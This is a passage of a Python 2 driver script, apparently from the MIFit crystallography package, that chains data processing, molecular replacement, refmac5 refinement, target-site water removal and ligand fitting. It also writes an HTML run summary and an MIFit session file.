print " --libfile The input library file. Default: no file"
print " --fragfit=FILE The fragfit file. Default: no file"
print " --chemfit=FILE The chemistry structure file. Default: no file"
print " --frag_center=\"x y z\" Center of the fragment. Default: none"
print " --mlwfile=FILE Input session file for viewpoint. Default: none"
print " --pdbviewfile=FILE Input PDB marker file for viewpoint. Default: none"
print " --mifit=yes or no Launch mifit when done. Default: no"
print " --bngsummary=DIR Path for bng summary html file. Default: no dir, do not produce"
print " --sg_search=yes or no Do a spacegroup search. Default: no"
print " --molimagehome=DIR Path to MIFit."
print " --writemap=yes or no Write map around target point. Default: no"
print " --detector_constants=FILE Detector constants file. Default: no file"
print " --process_engine=type Default: mosflm"
print " -?,--help This help."
print ""
print "Note:"
print " The number of hklin options should equal the number of workingdir options"
def Run(argv=None):
if argv is None:
argv=sys.argv
# Initialization and defaults
integrate = 'mi_runintegrate.txt'
dataprep = 'mi_rundataprep.txt'
molrep = 'mi_runmr.txt'
refine = 'mi_runrefine.txt'
inputfile = 'mi_runbng.txt'
mifit_root = 'none'
symlibinstall = 'none'
mlw_file = 'bng_milaunch.mlw'
phs_file = 'bng_mlmap.phs'
bngsummaryname = 'bng_jobsummary_1.htm'
bngsummaryroot = 'bng_jobsummary_'
hklin = 'none'
workingdir = 'none'
spacegroup_no = 'none'
referencemtz = 'none'
pdbin = 'none'
multi_search = 'no'
libfile = 'none'
fragfile = 'none'
chemfile = 'none'
fragcenter = 'none'
mlwfilein = 'none'
pdbviewfile = 'none'
launch_mifit = 'no'
bngsummary = 'none'
pdbfileout = 'none'
sg_search = 'no'
write_map = 'no'
detector_constants = 'none'
mr_sg = 'none'
mr_sg_best = 'none'
process_engine = 'mosflm'
fragview = '1.0000 0.0000 0.0000 0.0000 1.0000 0.0000 0.0000 0.0000 1.0000'
zoom = '30.00'
frontclip = '3.00'
backclip = '-3.00'
contourradius = '12.000000'
aList_contourlevels1 = []
aList_contourleveldefault1 = []
aList_contourcolor1 = []
aList_color1 = []
aList_contourlevels2 = []
aList_contourleveldefault2 = []
aList_contourcolor2 = []
aList_color2 = []
first_map = 'no'
second_map = 'no'
border = 10.0
water_radius = 15.0
water_radius = water_radius * water_radius
aList = []
aList_hklin = []
aList_workingdir = []
aList_dir = []
aList_sg = []
quote = """'"""
# parse args
number_of_args = len(argv)
args = argv[1:]
optlist, args = getopt.getopt(
args,'?',
['hklin=','workdir=','spacegroup_no=','reference_mtz=',
'pdbin=','multi_search=','libfile=','fragfit=','chemfit=',
'frag_center=','mlwfile=','pdbviewfile=','mifit=','bngsummary=',
'sg_search=','molimagehome=','writemap=',
'detector_constants=','process_engine=','help'])
number_of_inputs = len(optlist)
if number_of_inputs==0:
Usage()
return
count = 0
while count < number_of_inputs:
aList = optlist[count]
number_of_list_inputs = len(aList)
if number_of_list_inputs >=1:
arg_value = aList[0]
if arg_value == '-?' or arg_value=='--help':
Usage()
return
if number_of_list_inputs >=2:
param_value = aList[1]
if arg_value=='--hklin':
hklin = param_value
aList_hklin.append(hklin)
if arg_value=='--workdir':
workingdir = param_value
aList_workingdir.append(workingdir)
if arg_value=='--spacegroup_no':
spacegroup_no = param_value
if arg_value=='--reference_mtz':
referencemtz = param_value
if arg_value=='--pdbin':
pdbin = param_value
if arg_value=='--multi_search':
multi_search = param_value
if arg_value=='--libfile':
libfile = param_value
if arg_value=='--fragfit':
fragfile = param_value
if arg_value=='--chemfit':
chemfile = param_value
if arg_value=='--frag_center':
fragcenter = param_value
if arg_value=='--mlwfile':
mlwfilein = param_value
if arg_value=='--pdbviewfile':
pdbviewfile = param_value
if arg_value=='--mifit':
launch_mifit = param_value
if arg_value=='--bngsummary':
bngsummary = param_value
if arg_value=='--sg_search':
sg_search = param_value
if arg_value=='--molimagehome':
mifit_root = param_value
if arg_value=='--writemap':
write_map = param_value
if arg_value=='--detector_constants':
detector_constants = param_value
if arg_value=='--process_engine':
process_engine = param_value
count=count+1
ccp4,error = ccp4check.ccp4check()
if not ccp4:
print '\n' + error + '\n'
time.sleep(4)
return 1
# Capture initial CCP4 scratch space because subscripts may reset it
ccp4_scratch = os.environ['CCP4_SCR']
# Check MIFit installation to access various files (default and direct path)
if mifit_root == 'none':
print '\nMIFit root directory was not given\n'
time.sleep(4)
return 1
if not os.path.exists(mifit_root):
print '\nMIFit root directory was not found\n'
time.sleep(4)
return 1
# Set paths to MIFit executable and symmetry library
mifit_root_data = os.path.join(mifit_root,'data')
symlibinstall = os.path.join(mifit_root_data,'symlib')
test_platform = sys.platform
if test_platform.find('win') > -1:
mifitinstall = os.path.join(mifit_root,'MIFit.exe')
else:
mifitinstall = os.path.join(mifit_root,'MIFit')
if not os.path.exists(symlibinstall):
print '\nThe MI symmetry library was not located\n'
time.sleep(4)
return 1
# Check paired datasets/working directories
number_datasets = len(aList_hklin)
number_workingdirs = len(aList_workingdir)
if number_datasets != number_workingdirs and number_workingdirs != 0:
print '\nThe number of working directories must equal the number of datasets - stopping !\n'
time.sleep(4)
return 1
runcount = 0
while runcount < number_datasets:
hklin = aList_hklin[runcount]
if not os.path.exists(hklin):
time.sleep(4)
print '\nAn input data file was not found',hklin,'\n'
time.sleep(4)
return 1
runcount = runcount + 1
runcount = 0
while runcount < number_workingdirs:
workingdir = aList_workingdir[runcount]
if not os.path.exists(workingdir):
time.sleep(4)
print '\nAn input working directory file was not found',workingdir,'\n'
time.sleep(4)
return 1
runcount = runcount + 1
# Check all common input file paths
if not os.path.exists(pdbin):
print '\nThe input coordinate file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(libfile) and os.path.basename(libfile) != 'none':
print '\nThe input library file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(referencemtz) and os.path.basename(referencemtz) != 'none':
print '\nThe input reference data file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(fragfile) and os.path.basename(fragfile) != 'none':
print '\nThe input fragment coordinate file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(chemfile) and os.path.basename(chemfile) != 'none':
print '\nThe input chemistry structure file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(mlwfilein) and os.path.basename(mlwfilein) != 'none':
print '\nThe input session file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(bngsummary) and os.path.basename(bngsummary) != 'none':
print '\nThe directory for the BNG job summary was not found\n'
time.sleep(4)
return 1
# Check the image processing engine parameter is recognized
if process_engine != 'none' and process_engine != 'mosflm':
print '\nThe image processing engine must be set to one of none/mosflm'
time.sleep(4)
return 1
# Check and obtain fragment/view center
if fragcenter != 'none':
aList = fragcenter.split()
number_args = len(aList)
if number_args != 3:
print '\nThe fragment center must be three numbers for x,y,z\n'
time.sleep(4)
return 1
else:
x_center = aList[0]
y_center = aList[1]
z_center = aList[2]
x_center = float(x_center)
y_center = float(y_center)
z_center = float(z_center)
# Or parse view view point from first coordinate in PDB marker file (ATOM/HETATM record)
if pdbviewfile != 'none':
file = open(pdbviewfile,'r')
allLines = file.readlines()
file.close()
found_marker = 'no'
for eachLine in allLines:
tag = eachLine[0:6]
tag = tag.strip()
if tag == 'ATOM' or tag == 'HETATM':
if found_marker == 'no':
x_center = eachLine[30:38]
y_center = eachLine[38:46]
z_center = eachLine[46:54]
fragcenter = x_center + ' ' + y_center + ' ' + z_center
x_center = float(x_center)
y_center = float(y_center)
z_center = float(z_center)
found_marker = 'yes'
##########################################
# Parse view definitions from mlw file #
##########################################
if mlwfilein != 'none':
file = open(mlwfilein,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
# Get view point
if eachLine.find('translation') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 4:
x_center = aLine[1]
y_center = aLine[2]
z_center = aLine[3]
fragcenter = x_center + ' ' + y_center + ' ' + z_center
x_center = float(x_center)
y_center = float(y_center)
z_center = float(z_center)
if eachLine.find('rotation') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 10:
fragview = aLine[1] + ' ' + aLine[2] + ' ' + aLine[3] + ' ' \
+ aLine[4] + ' ' + aLine[5] + ' ' + aLine[6] + ' ' \
+ aLine[7] + ' ' + aLine[8] + ' ' + aLine[9]
if eachLine.find('zoom') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
zoom = aLine[1]
if eachLine.find('frontclip') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
frontclip = aLine[1]
if eachLine.find('backclip') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
backclip = aLine[1]
if eachLine.find('contourradius') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
contourradius = aLine[1]
# Get colors and contors
if eachLine.find('maptocont 1') > -1:
first_map = 'yes'
if eachLine.find('maptocont 2') > -1:
second_map = 'yes'
if second_map == 'no':
if eachLine.find('contourlevels') > -1:
aList = eachLine.split()
aList_contourlevels1.append(aList[1])
if eachLine.find('contourleveldefault') > -1:
aLine = eachLine[19:100]
aLine = aLine.strip()
aList_contourleveldefault1.append(aLine)
if eachLine.find('contourcolor') > -1:
aList = eachLine.split()
aList_contourcolor1.append(aList[1])
if eachLine.find('color') > -1:
aList = eachLine.split()
if aList[0] == 'color':
aList_color1.append(aList[1])
if second_map == 'yes':
if eachLine.find('contourlevels') > -1:
aList = eachLine.split()
aList_contourlevels2.append(aList[1])
if eachLine.find('contourleveldefault') > -1:
aLine = eachLine[19:100]
aLine = aLine.strip()
aList_contourleveldefault2.append(aLine)
if eachLine.find('contourcolor') > -1:
aList = eachLine.split()
aList_contourcolor2.append(aList[1])
if eachLine.find('color') > -1:
aList = eachLine.split()
if aList[0] == 'color':
aList_color2.append(aList[1])
# Check that for fragment input a center is also given
if fragfile != 'none' and fragcenter == 'none':
print '\nA fragment center must be available if a ligand file is given\n'
time.sleep(4)
return 1
##############################
# Prepare summary HTML file #
##############################
file_tag_max = 0
if os.path.basename(bngsummary) != 'none':
bngsummaryfile = os.path.join(bngsummary,bngsummaryname)
# If file already exists increment name
if os.path.exists(bngsummaryfile):
aList_dir = os.listdir(bngsummary)
number_files = len(aList_dir)
count = 0
while count < number_files:
test_file = aList_dir[count]
if test_file.find(bngsummaryroot) > -1:
aList = test_file.split('_')
number_args = len(aList)
if number_args > 2:
file_tag = aList[2]
file_tag = file_tag.replace('.htm','')
if file_tag.isdigit() == 1:
file_tag = int(file_tag)
if file_tag > file_tag_max:
file_tag_max = file_tag
count = count + 1
file_tag_max = int(file_tag_max)
file_tag_max = file_tag_max + 1
file_tag_max = str(file_tag_max)
bngsummaryname = bngsummaryroot + file_tag_max + '.htm'
bngsummaryfile = os.path.join(bngsummary,bngsummaryname)
print '\nRUN SUMMARY DATA LOG:',bngsummaryfile
runtime = time.ctime(time.time())
# HTML header
filename = bngsummaryfile
file = open(filename,'w')
file.write('<html>\n')
file.write('<head><title>BNG Run Summary</title></head>\n')
file.write('<body bgcolor = "white">\n')
file.write('<h2><center>BNG Run Summary</center></h2>\n')
file.write('<p>\n')
file.write('<b>Job start: ')
file.write(runtime)
file.write('</b>\n')
file.write('<p>\n')
file.write('<table border=1>\n')
file.write('<tr>\n')
file.write('<tr bgcolor = "yellow">\n')
file.write('<td>History</td>')
file.write('<td>Res. (Å)</td>')
file.write('<td>R<sub>work</sub></td>')
file.write('<td>R<sub>free</sub></td>')
file.write('<td>Error List</td>')
file.write('<td>Working Directory</td>')
file.write('</tr>\n')
file.write('<tr>\n')
file.close()
######################################################
# Loop over multiple dataset/working directory pairs #
######################################################
runcount = 0
while runcount < number_datasets:
list_runcount = runcount + 1
list_runcount = str(list_runcount)
print '\nSTARTING BNG PROCESS ON DATASET',list_runcount
print '\nUsing MIFit installation:',mifit_root
image_data_processed = 'yes'
hklin = aList_hklin[runcount]
# Default working directory path is dataset location
if number_workingdirs == 0:
workingdir = os.path.dirname(hklin)
else:
workingdir = aList_workingdir[runcount]
dir_list = os.listdir(workingdir)
number_files = len(dir_list)
os.chdir(workingdir)
##############################################################
# Data processing option (invoked via image file extensions) #
##############################################################
if hklin.find('.img') > -1 or hklin.find('.osc') > -1:
print '\nDATA PROCESSING'
image_data_processed = 'no'
# Check space group is set
if spacegroup_no == 'none':
print '\nThe space group number must be given for image data processing\n'
time.sleep(4)
return 1
# Establish a working directory (BNG) for merged data file and structure solution process
bng_workingdir = os.path.join(workingdir,'BNG')
if not os.path.exists(bng_workingdir):
os.mkdir(bng_workingdir)
# set args for image data processing
tmpargs=[]
tmpargs.append("integrate")
tmpargs.append("--template_image")
tmpargs.append(hklin)
tmpargs.append("--spacegroup")
tmpargs.append(spacegroup_no)
tmpargs.append('--workdir')
tmpargs.append(bng_workingdir)
if detector_constants != 'none':
tmpargs.append('--detector_constants')
tmpargs.append(detector_constants)
# Execute image data processing
if process_engine == 'mosflm':
import mi_integrate
if mi_integrate.Run(tmpargs)!=0:
runcount = runcount + 1
continue
hklin = os.path.join(bng_workingdir,'ScalAverage_1.mtz')
# Check image data processing succeeded
if not os.path.exists(hklin):
print '\nImage integration for failed\n'
time.sleep(4)
runcount = runcount + 1
continue
else:
workingdir = bng_workingdir
image_data_processed = 'yes'
######################
# Structure Solution #
######################
if image_data_processed == 'yes':
################
# Data import #
################
print '\nDATA SETUP'
# set args
tmpargs=[]
tmpargs.append("dataprep")
tmpargs.append('--hklin')
tmpargs.append(hklin)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--spacegroup')
tmpargs.append(spacegroup_no)
tmpargs.append('--reference_mtz')
tmpargs.append(referencemtz)
# Execute
import mi_dataprep
if mi_dataprep.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
############
# Run MR #
############
print '\nMR CALCULATIONS'
# Select mtz file name from the last data setup job and check space group
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
read_mtz_name = 'no'
mtzout = 'none'
spacegroup_check = 'none'
for eachLine in allLines:
if eachLine.find('Job ID:') > -1 and eachLine.find('dataprep_') > -1:
read_mtz_name = 'yes'
if read_mtz_name == 'yes' and eachLine.find('Output mtz data:') > -1:
mtzout = eachLine[16:200]
mtzout = mtzout.strip()
mtzout_full=mtzout
read_mtz_name = 'no'
if eachLine.find('Space group number:') > -1:
spacegroup_check = eachLine[19:100]
spacegroup_check = spacegroup_check.strip()
if mtzout == 'none':
print '\nThere is no mtz file to use for MR !\n'
time.sleep(4)
return 1
# Check user options are possible given space group indexing possibilities and available reference data
permutable = 'no'
if spacegroup_check == '75' or spacegroup_check == '76' or spacegroup_check == '77' or spacegroup_check == '78' \
or spacegroup_check == '79' or spacegroup_check == '80' or spacegroup_check == '143' or spacegroup_check == '144' \
or spacegroup_check == '145' or spacegroup_check == '146' or spacegroup_check == '149' \
or spacegroup_check == '151' or spacegroup_check == '153' or spacegroup_check == '150' or spacegroup_check == '152' \
or spacegroup_check == '154' or spacegroup_check == '155' or spacegroup_check == '168' or spacegroup_check == '169' \
or spacegroup_check == '170' or spacegroup_check == '171' or spacegroup_check == '172' or spacegroup_check == '173' \
or spacegroup_check == '195' or spacegroup_check == '196' or spacegroup_check == '197' or spacegroup_check == '198' \
or spacegroup_check == '199':
permutable = 'yes'
if permutable == 'yes' and referencemtz == 'none':
print '\nWarning: this space group is reindexable!'
print 'A reference data set is needed for target site water exclusion, ligand-fitting, molecule repositioning\n'
mlwfilein = 'none'
fragcenter = 'none'
fragfile = 'none'
# Write run file
tmpargs=[]
tmpargs.append("molrep")
tmpargs.append('--pdbfile')
tmpargs.append(pdbin)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout)
tmpargs.append('--fixed_pdb')
tmpargs.append('none')
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--multi_search')
tmpargs.append(multi_search)
tmpargs.append('--match_pdbin')
if permutable == 'yes' and referencemtz == 'none':
tmpargs.append('no')
else:
tmpargs.append('yes')
tmpargs.append('--sg_search')
if sg_search == 'yes':
tmpargs.append('yes')
else:
tmpargs.append('no')
# Execute
import mi_molrep
if mi_molrep.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
##########################
# Run initial refinement #
##########################
print '\nPRELIMINARY REFINEMENT'
read_r = 'no'
aList_pdb = []
aList_rvalue = []
pdbin_best_full = 'none'
pdbfile = 'none'
# Select the best coordinate file from the project log
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Job ID:') > -1 and eachLine.find('molrep_') > -1:
read_r = 'yes'
if eachLine.find('Output atoms:') > -1 and eachLine.find('molrep_') > -1 and read_r=='yes':
pdbfile = eachLine[14:]
pdbfile = pdbfile.strip()
aList_pdb.append(pdbfile)
if eachLine.find('MR space group:') > -1 and read_r == 'yes':
aList = eachLine.split(':')
mr_sg = aList[1]
aList_sg.append(mr_sg.strip())
if eachLine.find('Summary:') > -1 and read_r == 'yes':
aList = eachLine.split(':')
rvalue = aList[1]
rvalue = rvalue.replace('R=','')
aList_rvalue.append(rvalue)
read_r = 'no'
number_models = len(aList_rvalue)
rvalue_best = 999.00
if number_models == 0:
print '\nThere is no MR model to refine !\n'
time.sleep(4)
return 1
count = 0
while count < number_models:
rvalue = aList_rvalue[count]
if rvalue.isalpha() == 1:
print '\nMR R-value in history file is not a number - value is:',rvalue,'\n'
time.sleep(4)
return 1
else:
rvalue = float(rvalue)
if rvalue < rvalue_best:
pdbin_best = aList_pdb[count]
rvalue_best = rvalue
mr_sg_best = aList_sg[count]
count = count + 1
pdbin_best_full = pdbin_best.strip()
if rvalue_best > 0.65:
print '\nMR R-value is too high - stopping !\n'
time.sleep(4)
return 1
# Change the space group number in the data file if space group search option was invoked
if sg_search == 'yes':
if os.path.exists('mi_temp_sg_new.mtz'):
os.remove('mi_temp_sg_new.mtz')
file = open(mtzout_full,'rb')
allLines = file.readlines()
file.close()
file = open('mi_temp_sg.mtz','wb')
file.writelines(allLines)
file.close()
filename_inp = 'mi_cad_sg.inp'
filename_log = 'mi_cad_sg.log'
file = open(filename_inp,'w')
file.write('LABIN FILE_NUMBER 1 ALL\n')
file.write('SYMMETRY ')
file.write(mr_sg_best)
file.write('\n')
file.write('SORT H K L \n')
file.write('END\n')
file.close()
runcad = 'cad HKLIN1 mi_temp_sg.mtz HKLOUT mi_temp_sg_new.mtz < ' + filename_inp + ' > ' + filename_log
os.system(runcad)
if os.path.exists('mi_temp_sg_new.mtz'):
os.remove(filename_inp)
os.remove(filename_log)
os.remove('mi_temp_sg.mtz')
os.remove(mtzout_full)
os.rename('mi_temp_sg_new.mtz',mtzout_full)
# Write run file
tmpargs=[]
tmpargs.append("refine")
tmpargs.append('--pdbfile')
tmpargs.append(pdbin_best_full)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout_full)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--libfile')
tmpargs.append(libfile)
tmpargs.append('--engine')
tmpargs.append('refmac5')
tmpargs.append('--weight')
tmpargs.append('0.1')
tmpargs.append('--max_res')
tmpargs.append('none')
tmpargs.append('--bref_type')
tmpargs.append('none')
tmpargs.append('--cycles')
tmpargs.append('5')
tmpargs.append('--water_cycles')
tmpargs.append('0')
tmpargs.append('--mifithome')
tmpargs.append(mifit_root)
# Execute
import mi_refine
if mi_refine.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
#####################################
# Run refinement with water-picking #
#####################################
print '\nEXTENDED REFINEMENT'
# Select last coordinate file to continue refinement
pdbfile = 'none'
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if pdbfile == 'none':
print '\nPDB file for extended refinement was not found !\n'
time.sleep(4)
return 1
# Write run args
tmpargs=[]
tmpargs.append("refine")
tmpargs.append('--pdbfile')
tmpargs.append(pdbfile)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout_full)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--libfile')
tmpargs.append(libfile)
tmpargs.append('--engine')
tmpargs.append('refmac5')
tmpargs.append('--weight')
tmpargs.append('0.1')
tmpargs.append('--max_res')
tmpargs.append('none')
tmpargs.append('--bref_type')
tmpargs.append('none')
tmpargs.append('--cycles')
tmpargs.append('5')
tmpargs.append('--water_cycles')
tmpargs.append('3')
tmpargs.append('--mifithome')
tmpargs.append(mifit_root)
# Execute
import mi_refine
if mi_refine.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
#############################################################
# Run water deletion from target site if viewpoint was set #
#############################################################
if fragcenter != 'none':
print '\nRECOMPUTING MODEL AND MAP DATA WITH TARGET SITE WATERS REMOVED'
# Find coordinates and delete waters
pdbfile = 'none'
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if pdbfile == 'none':
print '\nPDB file for omit map calculations was not found !\n'
time.sleep(4)
return 1
file = open(pdbfile,'r')
allLines = file.readlines()
file.close()
pdbfile_omit = pdbfile.replace('.pdb','_omit.pdb')
file = open(pdbfile_omit,'w')
for eachLine in allLines:
tag = eachLine[0:6]
tag = tag.strip()
write_record = 'yes'
if tag == 'ATOM' or tag == 'HETATM':
if eachLine.find('HOH') > -1:
x = eachLine[30:38]
y = eachLine[38:46]
z = eachLine[46:54]
x = float(x)
y = float(y)
z = float(z)
dist = (x_center - x) ** 2 + (y_center - y)**2 + (z_center - z)** 2
if dist < water_radius:
write_record = 'no'
if write_record == 'yes':
file.write(eachLine)
file.close()
# Recalculate map data without target waters
# Write run args
tmpargs=[]
tmpargs.append("refine")
tmpargs.append('--pdbfile')
tmpargs.append(pdbfile_omit)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout_full)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--libfile')
tmpargs.append(libfile)
tmpargs.append('--engine')
tmpargs.append('refmac5')
tmpargs.append('--weight')
tmpargs.append('0.1')
tmpargs.append('--max_res')
tmpargs.append('none')
tmpargs.append('--bref_type')
tmpargs.append('none')
tmpargs.append('--cycles')
tmpargs.append('0')
tmpargs.append('--water_cycles')
tmpargs.append('0')
tmpargs.append('--mifithome')
tmpargs.append(mifit_root)
import mi_refine
if mi_refine.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
###############################################################
# Automated ligand-fitting subscripts may be invoked here #
###############################################################
# Example script for this option uses FFFEAR to perform 6D search with a single i/p ligand conformation
if fragcenter != 'none' and fragfile != 'none':
print '\nRIGID-BODY LIGAND FITTING'
print 'This option uses the example script: mi_ligandfit.py'
# Obtain paths to the last coordinate file and last data file
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if eachLine.find('Output phased data:') > -1:
mtzout = eachLine[19:200]
mtzout = mtzout.strip()
if pdbfile == 'none':
print '\nPDB file for rigid-body ligand fitting was not found\n'
time.sleep(4)
return 1
if mtzout == 'none':
print '\nMTZ file for rigid-body ligand fitting was not found\n'
time.sleep(4)
return 1
# Set output name for protein with ligand
pdbfileout = pdbfile.replace('.pdb','_ligand.pdb')
############################################################################
# Run the ligand-fitting routine #
# Ligand-fitting routines usually need: #
# pdbfile = the path to current protein model #
# mtzout = the path to phased diffraction data from REFMAC #
# workingdir = the path to the working directory #
# fragcenter = approx x,y,z coordinates for ligand #
# fragfile = the path to an input 3D model of ligand #
# pdbfileout = the path to o/p coordinates of protein with fitted ligand #
############################################################################
tmpargs=[]
tmpargs.append("ligandfit")
tmpargs.append('-f')
tmpargs.append(fragfile)
tmpargs.append('-m')
tmpargs.append(mtzout)
tmpargs.append('-p')
tmpargs.append(pdbfile)
tmpargs.append('-c')
tmpargs.append(fragcenter)
tmpargs.append('-d')
tmpargs.append(workingdir)
tmpargs.append('-o')
tmpargs.append(pdbfileout)
import mi_ligandfit
mi_ligandfit.Run(tmpargs)
# User may supply script/technology here, with inputs patterned on the rigid-body exemple
if fragcenter != 'none' and chemfile != 'none':
print '\nFLEXIBLE LIGAND FITTING'
print 'This option requires a user-supplied script to be called from mi_bng.py'
#########################################################
# Setup crystal and data files for interactive graphics #
#########################################################
pdbfile = 'none'
mtzout = 'none'
print '\nFILE CREATION FOR MIFIT'
print 'View center:',fragcenter
# Obtain paths to the last coordinate file and last data file
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if eachLine.find('Output phased data:') > -1:
mtzout = eachLine[19:200]
mtzout = mtzout.strip()
if pdbfile == 'none':
print '\nPDB file for session file was not found\n'
time.sleep(4)
return 1
if mtzout == 'none':
print '\nMTZ file for session file was not found\n'
time.sleep(4)
return 1
# Replace pdb file to version with ligand if automated-ligand fitting was done
if fragcenter != 'none' and fragfile != 'none' and pdbfileout != 'none':
fileexists = os.path.exists(pdbfileout)
if fileexists != 0:
pdbfile = pdbfileout
# Need local paths
pdbfile_local = os.path.basename(pdbfile)
mtzout_local = os.path.basename(mtzout)
#
# Write a minimal session (mlw) file to launch the display
#
# Obtain a model center for translation keyword if no fragment center was given
if fragcenter == 'none':
xmean = 0.0
ymean = 0.0
zmean = 0.0
number_atoms = 0.0
file = open(pdbfile,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
tag = eachLine[0:6]
tag = tag.strip()
if tag == 'ATOM' or tag == 'HETATM':
x = eachLine[30:38]
y = eachLine[38:46]
z = eachLine[46:54]
x = float(x)
y = float(y)
z = float(z)
xmean = x + xmean
ymean = y + ymean
zmean = z + zmean
number_atoms = number_atoms + 1.0
xmean = xmean/number_atoms
ymean = ymean/number_atoms
zmean = zmean/number_atoms
xmean = round(xmean,3)
ymean = round(ymean,3)
zmean = round(zmean,3)
xmean = str(xmean)
ymean = str(ymean)
zmean = str(zmean)
fragcenter_use = ' ' + xmean + ' ' + ymean + ' ' + zmean
else:
fragcenter_use = fragcenter
# Write session file
print 'Session file:',mlw_file
file = open(mlw_file,'w')
file.write('LoadPDB 1 ')
file.write(pdbfile_local)
file.write('\n')
# Standard likelihood weighted map
file.write('MapColumns FO=FWT PHI=PHWT\n')
file.write('LoadMapPhase 1 ')
file.write(mtzout)
file.write('\n')
file.write('silentmode\n')
file.write('coefficients Direct FFT\n')
file.write('fftapply\n')
file.write('maptocont 1\n')
file.write('maplinewidth 1.000000\n')
file.write('contourradius ')
file.write(contourradius)
file.write('\n')
# Write standard or user-defined colors
if first_map == 'no':
file.write('contourlevels 4\n')
file.write('contourleveldefault 50.000000 100.000000 50.000000 200.000000 250.000000\n')
file.write('color 21\n')
file.write('contourcolor 1\n')
file.write('color 22\n')
file.write('contourcolor 2\n')
file.write('color 23\n')
file.write('contourcolor 3\n')
file.write('color 24\n')
file.write('contourcolor 4\n')
file.write('color 25\n')
file.write('contourcolor 5\n')
else:
contourlevels1 = aList_contourlevels1[0]
contourleveldefault1 = aList_contourleveldefault1[0]
aLine = contourleveldefault1.split()
num_contours = len(aLine)
file.write('contourlevels ')
file.write(contourlevels1)
file.write('\n')
file.write('contourleveldefault ')
file.write(contourleveldefault1)
file.write('\n')
count = 0
while count < num_contours:
file.write('color ')
file.write(aList_color1[count])
file.write('\n')
file.write('contourcolor ')
file.write(aList_contourcolor1[count])
file.write('\n')
count = count + 1
file.write('contourmap 1\n')
# Likelihood weighted difference map
file.write('MapColumns FO=DELFWT PHI=PHDELFWT\n')
file.write('LoadMapPhase 2 ')
file.write(mtzout)
file.write('\n')
file.write('silentmode\n')
file.write('coefficients Direct FFT\n')
file.write('fftapply\n')
file.write('maptocont 2\n')
file.write('maplinewidth 1.000000\n')
file.write('contourradius ')
file.write(contourradius)
file.write('\n')
# Write standard or user-defined colors
if second_map == 'no':
file.write('contourlevels 6\n')
file.write('contourleveldefault -200.000000 -150.000000 150.000000 200.000000 250.000000\n')
file.write('color 24\n')
file.write('contourcolor 1\n')
file.write('color 25\n')
file.write('contourcolor 2\n')
file.write('color 21\n')
file.write('contourcolor 3\n')
file.write('color 22\n')
file.write('contourcolor 4\n')
file.write('color 23\n')
file.write('contourcolor 5\n')
else:
contourlevels2 = aList_contourlevels2[0]
contourleveldefault2 = aList_contourleveldefault2[0]
aLine = contourleveldefault2.split()
num_contours = len(aLine)
file.write('contourlevels ')
file.write(contourlevels2)
file.write('\n')
file.write('contourleveldefault ')
file.write(contourleveldefault2)
file.write('\n')
count = 0
while count < num_contours:
file.write('color ')
file.write(aList_color2[count])
file.write('\n')
file.write('contourcolor ')
file.write(aList_contourcolor2[count])
file.write('\n')
count = count + 1
file.write('contourmap 2\n')
# View parameters
file.write('translation ')
file.write(fragcenter_use)
file.write('\nrotation ')
file.write(fragview)
file.write('\n')
file.write('zoom ')
file.write(zoom)
file.write('\n')
file.write('perspective 0.000\n')
file.write('frontclip ')
file.write(frontclip)
file.write('\n')
file.write('backclip ')
file.write(backclip)
file.write('\n')
file.write('transform\n')
file.write('stereo off\n')
file.close()
#
# Option to write map around target point
#
if write_map == 'yes':
mapout_local = mtzout_local.replace('.mtz','_site.map')
# Compute complete map with CCP4/FFT
file = open('mi_fft.inp','w')
file.write('LABIN F1=FWT PHI=PHWT\n')
file.write('END\n')
file.close()
runfft = 'fft HKLIN ' + mtzout_local + ' MAPOUT mi_2ff.map < mi_fft.inp > mi_fft.log'
os.system(runfft)
if not os.path.exists('mi_2ff.map'):
print 'FFT for map display failed'
time.sleep(4)
return 1
else:
os.remove('mi_fft.inp')
